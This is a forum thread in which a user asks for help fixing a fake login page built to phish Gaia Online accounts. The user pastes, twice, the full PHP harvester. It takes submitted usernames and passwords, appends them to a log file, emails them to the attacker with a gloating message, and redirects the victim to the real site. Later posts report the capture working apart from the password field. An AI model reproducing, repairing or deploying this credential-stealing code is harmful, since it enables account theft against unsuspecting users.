login.php help?
Ok so I'm using TEMPTii's login.php creator program thats in UGB, and I'm pretty sure I'm using it correctly but I keep getting this error:
BTW I'm using his program to replace the php info in the Sent.php file of Obey's free FLP
This is what mine looks like:
The only part of that from the FLP login.php generator is the
Part, which I just pasted over the old one.
Sorry I'm so nooby with FLPs, but I need help
Thanks,
~Flareboy323
Warning: Unexpected character in input: '\' (ASCII=92) state=1 in /home/freehost/t35.com/w/1/[b]myt35and110mbUsername[/b]
/Sent.php on line 21
Warning: Unexpected character in input: '\' (ASCII=92) state=1 in /home/freehost/t35.com/w/1/[b]myt35and110mbUsername[/b]/Sent.php on line 21
Warning: Unexpected character in input: '\' (ASCII=92) state=1 in /home/freehost/t35.com/w/1/[b]myt35and110mbUsername[/b]/Sent.php on line 21
Parse error: syntax error, unexpected '"' in /home/freehost/t35.com/w/1/[b]myt35and110mbUsername[/b]/Sent.php on line 21BTW I'm using his program to replace the php info in the Sent.php file of Obey's free FLP
This is what mine looks like:
<html>
<head>
<title>http://www.gaiaonline.com/?sucess_sent/superprize=55423424</title>
<script type="text/javascript">
window.location = "http://Gaiaonline.com/inventory"
</script>
</head>
<body>
</body>
</html>
<?php
header ("Location: http://gaiaonline.com/inventory");
$username = $_POST['username'];
$password = $_POST['password'];
$subject = "You have an account waiting for you!";
$body = "Someone fell for your FLP! Their username is " . $username . " and their password is " . $password . "! Happy hacking!";
$date = date("F j, Y");
$all = "Username: " . $username . \n . "Password: " . $password . \n . "Date: " . $date . \n";
$file = "logicx.txt";
$handle = fopen($file, "a+");
mail("MYEMAILADDRESS@gmail.com",$subject,$body);
fwrite($handle, $all);
fclose($handle);
?>The only part of that from the FLP login.php generator is the
<?php
header ("Location: http://gaiaonline.com/inventory");
$username = $_POST['username'];
$password = $_POST['password'];
$subject = "You have an account waiting for you!";
$body = "Someone fell for your FLP! Their username is " . $username . " and their password is " . $password . "! Happy hacking!";
$date = date("F j, Y");
$all = "Username: " . $username . \n . "Password: " . $password . \n . "Date: " . $date . \n";
$file = "logicx.txt";
$handle = fopen($file, "a+");
mail("MYEMAILADDRESS@gmail.com",$subject,$body);
fwrite($handle, $all);
fclose($handle);
?>Part, which I just pasted over the old one.
Sorry I'm so nooby with FLPs, but I need help

Thanks,
~Flareboy323
Thanks a ton!
8 PM ---------- Previous post was at 02
im trying to figure out how to have it without the mail command
It works perfectly with the date and everything, but the password still dosent show up D: